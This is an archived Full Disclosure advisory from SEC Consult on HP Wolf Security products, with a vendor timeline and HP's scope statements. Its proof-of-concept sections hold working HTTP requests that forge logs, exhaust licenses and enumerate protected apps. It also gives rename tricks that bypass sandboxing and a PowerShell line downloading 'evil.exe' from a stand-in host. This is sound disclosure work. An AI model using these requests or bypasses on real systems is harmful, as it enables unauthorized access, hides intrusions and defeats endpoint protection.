| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <AS1PR07MB84319C7BB081E60D8D060FB9B38BA@AS1PR07MB8431.eurprd07.prod.outlook.com>
Date: Thu, 8 May 2025 08:52:35 +0000
From: SEC Consult Vulnerability Lab via Fulldisclosure
<fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Cc: SEC Consult Vulnerability Lab <security-research@...-consult.com>
Subject: [FD] SEC Consult SA-20250429-0 :: Multiple Vulnerabilities in HP
Wolf Security Controller and more
SEC Consult Vulnerability Lab Security Advisory < publishing date 20250429-0 >
Combined Security Advisory for Sure Access Enterprise and Sure Click Enterprise
=======================================================================
title: Multiple Vulnerabilities
product: HP Wolf Security Controller / HP Sure Access Enterprise /
HP Sure Click Enterprise
vulnerable version: HP Wolf Security Controller 4.3.127.238 & 4.4.155.291,
HP Wolf Sure Click Enterprise Client Version 4.3.11.45 with
Extensionpack Sure Access Enterprise 8.0.125,
HP Wolf Sure Click 4.4.3.274
fixed version: TODO
CVE number: TODO
impact: High
homepage: https://www.hp.com/us-en/security/enterprise-pc-security.html
found: 2022-09-15 (Sure Access) & 2023-08-18 (Sure Click)
by: Daniel Hirschberger (Office Bochum)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"HP Sure Access Enterprise uses hardware-enforced virtualization-based security
to isolate critical applications running on Microsoft Windows clients. The
zero-trust solution is deployed on the user’s PC, beneath the operating system
(OS) layer, where it creates a hardware-protected virtual machine (VM) that is
completely isolated from the Windows OS. Through this innovative approach, the
solution secures a number of key assets, including memory and CPU state, disk
structures, keyboard input, display outputs, and network traffic.
Even if a user’s endpoint is compromised, it won’t pose any risk to the remote
application and the sensitive data it contains, allowing users to work securely
on multiple remote Privileged Access Workstations (PAWs) from a single device.
The user can only access the application through the hardware-protected VM,
which remains isolated from the Windows OS—and any malware that might attack it."
Source: https://h20195.www2.hp.com/v2/GetDocument.aspx?docname=4AA7-6965ENW
"HP Sure Click Enterprise stops attacks and protects your endpoints by creating
micro–virtual machines (micro-VMs) that secure end-user tasks, from surfing the
web to opening email and downloading attachments. High-risk tasks are completely
isolated inside the micro-VM. When a task is closed, the micro-VM—and any threat
it contained—is disposed of without any breach. Sure Click Enterprise is
powered by hardware-enforced isolation technology that uses virtualization-based
security on the host to contain threats inside individual, disposable micro-
VMs. This approach dramatically decreases attack surfaces, while preserving
familiar user workflows."
Source: https://h20195.www2.hp.com/v2/getpdf.aspx/4AA7-6963ENW.pdf
Business recommendation:
------------------------
The vendor does not provide a patch because according to HP, the issues are
configuration-related or limitations or out of scope of the products themselves.
See statements below.
Customers must check if they are enforcing authentication with TLS Client
Certificates for Sure Access, Sure Click and the HP Wolf Security Controller.
This is the intended and recommended configuration according to HP. Links to
their configuration guidelines can be found at the bottom in the "Solution"
section
SEC Consult highly recommends to perform a thorough security review of the
product conducted by security professionals to identify and resolve potential
further security issues.
General information:
--------------------
SEC Consult conducted penetration tests on Sure Access in 2022 and on Sure Click
in 2023 and established a contact with HP afterwards. After several rounds of
emails and meetings with the product development team, the scope and limitations
of Sure Access and Sure Click were made clear. This advisory combines the result
of those penetration tests.
In summary, most of the issues we identified as a vulnerability are not in
the scope or attacker model of Sure Access/Sure Click. Several issues can be
prevented by correctly configuring both products, e.g., enforcing authentication
with TLS Client Certificates, according to HP.
The identified issues will be categorized into the affected product, followed by
the classification if it is a real vulnerability or a misconfiguration.
Statement from HP
-----------------------------------
HP sent us a statement which can be summarized as follows:
Sure Click Enterprise considers the following out-of-scope:
- Malicious users
- Local administrators
- Malicious servers or infrastructure/server admins
Sure Access Enterprise considers the following out-of-scope:
- Malicious users with direct access to Sure Access Enterprise Apps and
credentials to use them
- Malicious infrastructure/server admins
- Service availability on the endpoint
- Protection of resources which are not explicitly enrolled into Sure Access
Enterprise
Vulnerability overview/description:
-----------------------------------
1) HP Wolf Security Controller
a) Misconfiguration
Missing Authentication and Authorization on the deviceAPI
Clients routinely contact the Security Controller server to refresh their
policies and send device logs to it.
Unfortunately, calling functions on the deviceAPI does neither require
authentication nor authorization.
Thus, clients can perform arbitrary deviceAPI actions which leads to further
vulnerabilities.
b) Vulnerability: Missing CSRF Protection
The deviceAPI does not implement CSRF protection. This means that an
attacker who knows the internal IP of the Security Controller can prepare a
malicious link and trick users in the internal network to call arbitrary
deviceAPI functions.
c) Misconfiguration: Unauthorized Access to other Applications
The Security Controller allows defining 'Applications' and assigning them to
individual devices or device groups. These applications are mostly HTTP(S), SSH
or RDP connections to specific hosts. When such an application is opened, a new
micro-VM is spawned, the requested connection is established in the micro-VM and
the resulting UI is rendered in a separate window.
Because the deviceAPI does neither require authentication nor authorization, an
attacker can fetch any application from the server and subsequently access it.
d) Vulnerability: Missing Anti-Automation Protection
Because of missing anti-automation measures an attacker can call the /register/
endpoint of the deviceAPI repeatedly and burn through the available licenses.
This is not an issue in itself because the product still works even if all
licenses are used up.
Nonetheless, in combination with the next vulnerability an attacker is able
to generate a considerable amount of bogus logs in a short timeframe.
e) Vulnerability: Log Forging
Because of the unprotected deviceAPI an attacker can forge logs for any device.
This is especially devastating in combination with the missing self-protection
because an attacker can disable the Sure Access Enterprise client and forge logs
which show that the device is still protected.
2. HP Wolf Sure Access Enterprise Client
a) Out of Scope: Missing Self-Protection
A local operating system administrator account can just click on the button
labeled 'Disable' in the GUI of the client to deactivate the protection
altogether.
b) Out of Scope: Bypassing the RDP Interception
RDP connections which are started via mstsc.exe are usually intercepted by the
client and opened in a micro-VM which performs the RDP connection instead. The
user just sees the UI of the micro-VM and is asked to enter his RDP credentials.
This can be trivially bypassed by renaming mstsc.exe.
3. HP Wolf Sure Click Enterprise
a) Out of Scope: Bypassable File Execution Prevention
Each file which was downloaded through an HP Wolf virtualized browser is
marked as untrusted and can only be executed after the file has been scanned
for malicious code.
This can be bypassed by downloading a file through other means, e.g., with
powershell's Invoke-Webrequest method.
Another way to exploit this consists of bypassing the browser virtualization
which will be described next.
b) Out of Scope: Bypassable Browser Virtualization
HP Wolf has a hard-coded list of executable names which should be executed
in a micro-VM. These applications get executed in HP's sandbox and only the GUI
is exposed to the user.
By renaming the browser executable, this can be easily bypassed.
For example by renaming firefox.exe to firefux.exe.
c) Out of Scope: Inadequate Self-Protection
Depending on the used policy, an administrator can no longer easily
disable the protection through a button in the GUI as described in previously.
However, he can kill the BrService.exe and BrHostSrv.exe which effectively
disables the protection altogether.
Proof of concept:
-----------------
1) HP Wolf Security Controller
a) Missing Authentication and Authorization on the deviceAPI
While intercepting the communication between client and server, the following
request was observed:
-------------------------------------------------------------------------------
GET /deviceapi/protected-apps/173-176-177-184-186-188-189/ HTTP/2
Host: <IP OF SECURITY CONTROLLER>
Accept-Encoding: gzip, deflate
User-Agent: HP-Sure-Click/4.3.11.45
-------------------------------------------------------------------------------
This shows that there is no authentication and authorization check, meaning that
this request can be repeated by an attacker and yields the same result
as if a valid client performed the request.
b) Missing CSRF Protection
>From the previous request it is also clear that there is no CSRF protection on
the API. Thus, an attacker can craft a malicious link or webpage and trick a
user into sending arbitrary requests to the deviceAPI.
c) Unauthorized Access to other Applications
The missing authentication and authorization checks allow an attacker to access
arbitrary applications.
A device fetches its allowed applications with the following request:
-------------------------------------------------------------------------------
GET /deviceapi/protected-apps/173-176-177-184-186-188-189/ HTTP/2
Host: <IP OF SECURITY CONTROLLER>
Accept-Encoding: gzip, deflate
User-Agent: HP-Sure-Click/4.3.11.45
-------------------------------------------------------------------------------
The numbers 173-176-177-184-186-188-189 correspond to internal ids of the
applications. So this request fetches the applications with the ids 173, 176,
177, 184, 186, 188, 189.
The server answers with a JSON object which contains information about
these applications:
-------------------------------------------------------------------------------
HTTP/2 200 OK
[...]
{
"apps": [
{
"id": 173,
"symbolic_id": 18,
"configuration": {
"binary": "QVNwYwAAAAAAAAAAAAAAAAAAAAAJAAAAAwAAAAAAAAAAAAAADAAA[...]"
}
},
[...]
]
}
-------------------------------------------------------------------------------
Attackers can easily extract the configuration for each existing application
even if they should not have access to it, just by enumerating ids and sending
the previous request.
For example:
-------------------------------------------------------------------------------
GET /deviceapi/protected-apps/0-1-2-3-[...]/ HTTP/2
Host: <IP OF SECURITY CONTROLLER>
Accept-Encoding: gzip, deflate
User-Agent: HP-Sure-Click/4.3.11.45
-------------------------------------------------------------------------------
The server will respond with the configuration for each application.
The "binary" part of the configuration can be base64-decoded and written to a
file, e.g., "decoded.bin".
Then an attacker can use the "BrProtectedAppCmd.exe" to start the application
just like the client does when double-clicking on an application:
-------------------------------------------------------------------------------
C:\Program Files\HP\Sure Click\ApplicationSupport\pvm\8.0.125\BrProtectedAppCmd.exe
start decoded.bin
-------------------------------------------------------------------------------
The following image shows an example where the AppId of an HTTPS connection to
the HP Wolf Security Controller was guessed and accessed with this trick without
having the needed permission:
[advisory_arbitrary_apps.png]
d) Missing Anti-Automation Protection
The API is also missing an anti-automation protection. Therefore, an attacker
can repeat any API call without limit. Since HP Wolf Security works on a
per-license basis, an attacker can burn through licenses by repeatedly
calling the /register/ endpoint.
For example the following request can be repeated 100 times to use up 100
licenses:
-------------------------------------------------------------------------------
POST /deviceapi/register/ HTTP/2
Host: <SECURITY_CONTROLLER_IP>
Content-Type: multipart/form-data; boundary="07DC54E11C8A7E8BCA894ACC"
Accept-Encoding: gzip, deflate
User-Agent: HP-Sure-Click/4.3.11.45
Content-Length: 533
--07DC54E11C8A7E8BCA894ACC
Content-Disposition: form-data; name="identifier"
Content-Type: application/json
{
"api_version": 12,
"computername": "test-001",
"domainname": "example.test",
"fingerprint": "h",
"oem": 1,
"token": "",
"user_domainname": "",
"username": ""
}
--07DC54E11C8A7E8BCA894ACC Content-Disposition: form-data; name="version"
Content-Type: application/json
{
"platform": 4096,
"upgrade_code": "a",
"version": "4.3.11.45"
}
--07DC54E11C8A7E8BCA894ACC--
-------------------------------------------------------------------------------
The following two images and show the amount of available licenses before and after
this attack.
[advisory_license_start.png]
[advisory_license_end.png]
e) Log Forging
The Security Controller allows any device to send bogus data and even spoof logs
of other clients.
For example the following request can be used to send a log message that
is dated in the year 2038:
-------------------------------------------------------------------------------
POST /deviceapi/log/ HTTP/2
Host: <SECURITY_CONTROLLER_IP>
Content-Type: multipart/form-data; boundary="B4D45404F92AA031B731E747"
Accept-Encoding: gzip, deflate
User-Agent: HP-Sure-Click/4.3.11.45
Content-Length: 1003
--B4D45404F92AA031B731E747 Content-Disposition: form-data; name="identifier"
Content-Type: application/json
{
"api_version": 12,
"computername": "test-001",
"domainname": "example.test",
"fingerprint": "anything",
"oem": 1,
"token": "deprecated",
"user_domainname": "example.test",
"username": "pentest"
}
--B4D45404F92AA031B731E747
Content-Disposition: form-data; name="logs"
Content-Type: application/json
[
{
"component": "Isolation",
"msgtypeid_ex": 0,
"params": {
"msg": "Bromium restarted"
},
"params_ex": {},
"severity": 6,
"source": 257,
"time": 2146777200,
"version": "4.3.11.45"
}
]
--B4D45404F92AA031B731E747
Content-Disposition: form-data; name="version"
Content-Type: application/json
{
"platform": 4096,
"upgrade_code": "anything",
"version": "4.3.11.45"
}
--B4D45404F92AA031B731E747--
-------------------------------------------------------------------------------
A faked log message can be seen in the following image:
[advisory_log_forging.png]
This allows faking logs and combined with the missing anti-automation an
attacker can create a huge amount of noise. This will render the log unusable.
2) HP Wolf Sure Access Enterprise Client
a) Missing Self-Protection
The GUI contains a button labeled 'Disable' which local administrators
can click to disable the client.
The following image shows this GUI and highlights the button:
[advisory_deactivate.png]
b) Bypassing the RDP Interception
There is a registry key
"HKLM\SOFTWARE\HP\Security Update Service\Policies\Untrusted.ProcessNeedsProtectedAppHooking"
with the value "mstsc.exe,RDCMan.exe,ASGRD.exe,mRemoteNG.exe".
This shows that the client only matches on the file names of the executables.
Therefore one can copy these executables from the system folder to another
location and rename them to bypass the RDP interception.
For mstsc.exe the following steps have to be performed:
1. Copy "C:\Windows\System32\mstsc.exe" to the Desktop.
2. Rename it to "mymstsc.exe".
3. Search for "mstsc.exe.mui" in C:\Windows\System32. This should return a
folder with your local language identifier, e.g., /en-GB/ or /de-DE/ which
contains the "mstsc.exe.mui" file.
4. Create this language folder next to your "mymstsc.exe".
5. Copy the "mstsc.exe.mui" from the language folder in System32 to the newly
created one and rename it, so the name of the .exe matches the name of the
.mui file, e.g., "mymstsc.exe.mui".
6. Double-click on "mymstsc.exe" and the usual RDP GUI will start. Now you can
RDP to another machine without the RDP interception.
3) HP Wolf Sure Click Enterprise
a) Bypassable File Execution Prevention
All files which are downloaded through an application which is virtualized by HP
Wolf Security (mostly browsers), are flagged as untrusted. When a user tries to
open or execute the file, HP Wolf scans the file and if it is deemed trustworthy
a user can remove the flag and open/execute it.
Unfortunately, only files which are acquired via virtualized browsers are
flagged. Therefore, an attacker can easily bypass this protection by using
alternative download options, for example a powershell command:
> Invoke-WebRequest -Uri https://example.test/evil.exe -OutFile evil.exe
This file does not possess the flag and can directly be opened/executed.
Another way to bypass this protection is based on bypassing the browser
virtualization feature.
b) Bypassable Browser Virtualization
Similar to the RDP Interception bypass described earlier, the Sure Click
client has a blacklist of applications which should be spawnedin a micro-VM.
<working_browser_virtualization.png>
Therefore, the same trick can be reused to bypass this as well.
For example, the "firefox.exe" executable is part of this blacklist.
By copying the "C:\Program Files\Mozilla Firefox\" to the user's desktop and
renaming the contained "firefox.exe" to "firefux.exe" this can be bypassed.
<bypassed_browser_virtualization.png>
c) Inadequate Self-Protection
As an improvement to the situation, the self-protection can no longer be
easily disabled in the GUI if a strong policy is applied.
However, by killing the services "BrService.exe" and "BrHostSrv.exe" a local
administrator can still crash and therefore bypass the protection.
<sure_click_disabled.png>
Vulnerable / tested versions:
-----------------------------
The following product versions have been tested in September 2022:
* HP Wolf Security Controller 4.3.127.238
* HP Sure Click Enterprise Client Version 4.3.11.45 with
Extensionpack Sure Access Enterprise 8.0.125
The following product versions have been tested in August 2023:
at the time of the test:
* HP Wolf Security Controller 4.4.155.291
* HP Wolf Sure Click 4.4.3.274
Vendor contact timeline:
------------------------
The vulnerability was identified in September 2022 and initially a third
party did the coordination, but information to HP got lost and we were
re-establishing our responsible disclosure process later again.
2023-09-21: Customer gives permission to contact vendor
2023-10-11: Sending the advisories to HP
2023-10-13: Senior Manager of HP Germany contacts us
2023-10-18: Same Senior Manager sends us feedback from the Product Owner
2023-12-01: Same Senior Manager requests a meeting between SEC Consult and the
Product Owner at HP
2024-01-30: Meeting with Product Owner and Development Team of HP;
due to time constraints we agree to hold a second meeting
2024-03-13: Second Meeting with Product Owner and Development Team
2024-03-26: Updating the advisory with the statements of the Product Owner
2024-05-21: Asking for a status update.
2024-05-22: Vendor: currently working internally; will ask the product team
for an update
2024-07-18: Asking for a status update.
2024-07-26: Vendor will get back to us at the latest 2024-08-12 with a detailed
response
2024-08-08: We receive a detailed email clarifying the scope of the products and
their opinion on the issues (e.g. misconfiguration)
2024-10-09: We agree that most of the issues could be misconfigurations, provide
our view and declare our intent to publish an advisory which clearly
mentions the possibility of misconfigurations.
Regarding CSRF clarify the risks again.
Vendor asks where the advisory will be published.
2024-10-11: We inform the vendor that the advisory will be published
at https://sec-consult.com/vulnerability-lab/, the Full
Disclosure Mailing list and we will link to it via Twitter/X and
LinkedIn.
2024-10-21: We merge the two existing HP Wolf Security advisories into one,
add 'Statements from HP' verbatim and prefix each finding with
the category, e.g. Misconfiguration, Out of Scope, Vulnerability.
We send the updated advisory to the vendor and ask for a link
to their best practices regarding configuration.
2024-11-12: We ask for a status update and state that we want to publish
soon.
2024-11-18: Status: The product team is working on it.
2025-01-13: We are asking for a status update and due to the lengthy
disclosure process we set a deadline for publication for
mid-february at the latest.
2025-02-05: HP sends us a list of documentation we can link to in the
advisory.
2025-02-06: We ask if there are patched versions we can link to in the
advisory.
2025-03-19: ^
2025-04-16: We communicate that we want to publish on 2025-04-28 and provide
them with the latest version of this advisory.
2025-04-29: Advisory was published.
Solution:
---------
Customers have to check if their installation is configured according to HP's
best practices:
https://enterprisesecurity.hp.com/s/documentation
HP Sure Click Enterprise:
Solution Brief: https://h20195.www2.hp.com/v2/getpdf.aspx/4AA7-7470ENUS.pdf
Data Sheet: https://h20195.www2.hp.com/v2/getpdf.aspx/4AA7-6963ENW.pdf
Documentation: https://documentation.bromium.com/4_4/Release%20Notes/HP%20Sure%20Click%20Enterprise%204.4%20Release%208%20Update%201%20-%20Release%20Notes.pdf
HP Sure Access Enterprise:
Solution Brief : https://h20195.www2.hp.com/v2/GetDocument.aspx?docname=4AA8-1466ENW
Data Sheet: https://h20195.www2.hp.com/v2/GetDocument.aspx?docname=4AA8-1110ENW
Documentation: https://documentation.bromium.com/4_4/Release%20Notes/HP%20Sure%20Access%20Enterprise%208.1%20Release%204%20Release%20Notes.pdf
Deployment Guide: https://documentation.bromium.com/8_1/Release%20Notes/HP%20Sure%20Access%20Enterprise%208.1%20Release%203%20-%20Deployment%20Guide.pdf
Workaround:
-----------
None
Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Eviden business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: https://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Daniel Hirschberger / @2025
Download attachment "smime.p7s" of type "application/pkcs7-signature" (5112 bytes)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists